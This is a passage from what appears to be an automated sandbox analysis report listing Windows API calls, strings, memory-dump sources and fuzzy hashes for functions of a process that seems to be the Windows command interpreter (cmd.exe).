                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,011E4533), ref: 011E46A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1646373207-2530943252
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E1FA3
                                    • wcsspn.MSVCRT ref: 011E2181
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2278
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                    • String ID:
                                    • API String ID: 1535828850-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E3B91
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3CF6
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,-00000001,00000000,?,00000000), ref: 011EE015
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9CF
                                      • Part of subcall function 011DC923: _wcsicmp.MSVCRT ref: 011DC9E5
                                      • Part of subcall function 011DC923: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,00000000,?,00000000), ref: 011DCA04
                                      • Part of subcall function 011DC923: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DCA15
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D87
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2D91
                                      • Part of subcall function 011E2D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DA4
                                      • Part of subcall function 011E2D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E3C29,?,00000000,-00000001,00000000,?,00000000), ref: 011E2DAE
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 011E3CC5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E3CD0
                                      • Part of subcall function 011E2349: wcsrchr.MSVCRT ref: 011E234F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
                                    • String ID:
                                    • API String ID: 3402406610-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$_setjmp3
                                    • String ID:
                                    • API String ID: 4215035025-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011F8FA5
                                    • memset.MSVCRT ref: 011F8FC5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcsicmp.MSVCRT ref: 011F9073
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9085
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F9092
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$_wcsicmp
                                    • String ID:
                                    • API String ID: 1670951261-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F8E99
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F8EA1
                                    • _get_osfhandle.MSVCRT ref: 011F8F27
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 011F8F2F
                                      • Part of subcall function 011F85E9: longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86B6
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86E4
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F8712
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F8F40
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                    • String ID:
                                    • API String ID: 288106245-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011D5734
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 011D573C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E96FE
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E974A
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011E9775
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                    • String ID:
                                    • API String ID: 3588551418-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011E6ACB
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 011E6B0F
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 011E6B3E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6B4F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$DriveInformationTypeVolume
                                    • String ID:
                                    • API String ID: 285405857-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0699
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D69F2,?,00000001,?,?,00000000), ref: 011E06A1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: FilePointer_get_osfhandle
                                    • String ID:
                                    • API String ID: 1013686580-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F7EF1
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F7EFE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
                                    • String ID:
                                    • API String ID: 2847887402-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                    • memset.MSVCRT ref: 011E4703
                                    • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EE8B8
                                    • memset.MSVCRT ref: 011EE92E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$ConsoleInfoLocaleOutputThread
                                    • String ID:
                                    • API String ID: 1263632223-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BBA
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BE9
                                    • _getch.MSVCRT ref: 011F3BEF
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C07
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C1D
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                    • String ID:
                                    • API String ID: 491502236-0
                                    • Opcode ID: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction ID: abd1d2d664a651f4f02b1e5ca1b83fe43c9fe2bf23d56590595e316bbb62bdb6
                                    • Opcode Fuzzy Hash: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction Fuzzy Hash: 0B01D832514255AFDB2DEB65BC1DBAA7BA9FB10324F00025EFA1682084DFB18A80C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                    • memcpy.MSVCRT ref: 011E3AE3
                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                    • String ID:
                                    • API String ID: 713576409-0
                                    • Opcode ID: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction ID: f84b0b0ddba6df0dee14cdd1735a99c968783b6c124e7ce4adbd897c6478f49f
                                    • Opcode Fuzzy Hash: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction Fuzzy Hash: 34E09273A0091167DA3166AE7C5CDAF6DAEEBD99657150058F91AC3204DF308CC246B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E5590: memset.MSVCRT ref: 011E5614
                                      • Part of subcall function 011E0040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,011E36B3,011E3691,00000000), ref: 011E0078
                                      • Part of subcall function 011E0040: RtlFreeHeap.NTDLL(00000000), ref: 011E007F
                                    • memset.MSVCRT ref: 011E5303
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • memset.MSVCRT ref: 011E547A
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,?,?), ref: 011EF111
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$memset$Process$AllocFreelongjmp
                                    • String ID: *.*
                                    • API String ID: 539101449-438819550
                                    • Opcode ID: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction ID: f272619b77c9fde7b7153aa4ca50a1b8708a0100f008a81fdcae6fb49fc07b02
                                    • Opcode Fuzzy Hash: 27be6b93dd1fcd828cadc6e1e1316623b2fa948dbe10fb922e1a4106583762fe
                                    • Instruction Fuzzy Hash: 1AB1B075E00A069BDB6DDFE8C848AAEBBF3AF58318F154069E905EB241D731DD41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                    • API String ID: 0-1704545398
                                    • Opcode ID: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction ID: 57408817a8dd5529476c4dff142a9f40bd4cfef1c67897232c3cf6abd08dabe3
                                    • Opcode Fuzzy Hash: 2b5d0af96e814cbabd102fcacaa2d93e77093fb51009aeaaa89abef7ab3c268d
                                    • Instruction Fuzzy Hash: 8B513C317401075BEB3DAFBCD91837A76E2FB95318F49812AD5038B285DB718687C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: iswdigit$wcstol
                                    • String ID: aApP
                                    • API String ID: 644763121-2547155087
                                    • Opcode ID: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                    • Instruction ID: 0aa3b0cca32f986d17f25b8c548019d41504aff5f6729d95060213638df22435
                                    • Opcode Fuzzy Hash: 13c19929543b992d4d1fc5e574e4e91b71b5aaa6719b4bf0e1b63874c5fd8980
                                    • Instruction Fuzzy Hash: F0410379A0011286EF2CDBACE88527FB7B5BF55204715443EEF46DBA85EB30D982C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4B9E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 011F4C2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: EnumErrorLast
                                    • String ID: %s=%s$.
                                    • API String ID: 1967352920-4275322459
                                    • Opcode ID: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction ID: 666e5663c9a4e08802e6672649645547f98ad4a168bfce08b4b2956925f350b7
                                    • Opcode Fuzzy Hash: d314d35c3486a268e026177c53f8399a4ff5da415a5c2493de5dad2cec4985f2
                                    • Instruction Fuzzy Hash: B6416871F0021A87CB3CABAD9CA8BBB76F9EB94314F0501ADDA1A97240DF704E418791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011FABB5
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _wcslwr.MSVCRT ref: 011FAC29
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAC59
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$_wcslwr
                                    • String ID: [%s]
                                    • API String ID: 886762496-302437576
                                    • Opcode ID: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction ID: c09e236cb5b70b2300a053064a6c06793fd04e8c558ed09549297d71da787e97
                                    • Opcode Fuzzy Hash: b9b84d905259faf843a9373ea6ad6168b09eab37c2284d8bdd14e7427d8d1183
                                    • Instruction Fuzzy Hash: 32217571B002195BDB19DAE4E989BBEBBE8AF58314F4804ADE609D3141EB74DE44CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsnicmp
                                    • String ID: /-Y$COPYCMD
                                    • API String ID: 1886669725-617350906
                                    • Opcode ID: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction ID: 0c03cfd9843b9412f30f3c6e4ef8bd79977d8261c01111121fc3b547cca2b04f
                                    • Opcode Fuzzy Hash: 007c1bb04e1bda4d31a699e55e4d7fefbd4d337cb042c61281ed1da372ea2239
                                    • Instruction Fuzzy Hash: 9F219B72A08A1297DB2C9B9E984D6BAFAF6EFA5250F950069FC4D97241EF308D41C250
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                    • iswspace.MSVCRT ref: 011E23C8
                                    • _wcsnicmp.MSVCRT ref: 011E2419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: iswspace$_wcsnicmp
                                    • String ID: off
                                    • API String ID: 3989682491-733764931
                                    • Opcode ID: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction ID: e69aba4d19a21cf1db1f221edfc95bb234fc90446da2207306f5561b6a4fc8fa
                                    • Opcode Fuzzy Hash: 8a0af50a4a01f09a364fe918f145a58c87cd44f753eb4ea734b20fb6b8fc66ce
                                    • Instruction Fuzzy Hash: F2114C22704E1256FF3E12EE7C7EF3A55EC9F95959B19002AFD46E60C1EF7089808162
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E7721: __iob_func.MSVCRT ref: 011E7726
                                    • fprintf.MSVCRT ref: 011F4522
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: __iob_funcfprintf
                                    • String ID: CMD Internal Error %s$%s$Null environment
                                    • API String ID: 620453056-2781220306
                                    • Opcode ID: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction ID: 2455adb61447690e94106b46cdd9ec1ad82f53c622971da49736dc96b39d309f
                                    • Opcode Fuzzy Hash: eb19b79a726f596bf4e5e6a4a992bc2cb5ed2d63eb28a2d781464dedadf5cfba
                                    • Instruction Fuzzy Hash: 40019E77A442118EDB3CBB9C785D5B37354EAD0214315053FEE6693D54FB705942C141
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 011F2979
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 011F298A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: RtlDllShutdownInProgress$ntdll.dll
                                    • API String ID: 1646373207-582119455
                                    • Opcode ID: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction ID: 214ba48a93f13fbb78718f528236add32a921ae3f11247491a49c13772eb1db1
                                    • Opcode Fuzzy Hash: 21eab838b83626d7c075a2ff88e5b9b68ef2da93aa89548445e264d6cca09167
                                    • Instruction Fuzzy Hash: 1FF09031A20328DB8F39DF69B91D67A37E8FB54A98781025DEC01D7208EF719D418BD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011D8991
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D8AAB
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$CurrentDirectory
                                    • String ID:
                                    • API String ID: 168429351-0
                                    • Opcode ID: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction ID: 659a171f208aa7f7ccb7f6b7326bde9e71d26b5a2e188439e0af765a3fd8b6fc
                                    • Opcode Fuzzy Hash: 10d097d6ebd7d447ee04fbd723f1d90870b57ec9d1276c4b18fcd69d903e8d81
                                    • Instruction Fuzzy Hash: 4E6156B1A083029FD72CDF69D48466BBBE5BBD8314F14492EF699C3250EB709904CB87
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsnicmp$wcschr
                                    • String ID:
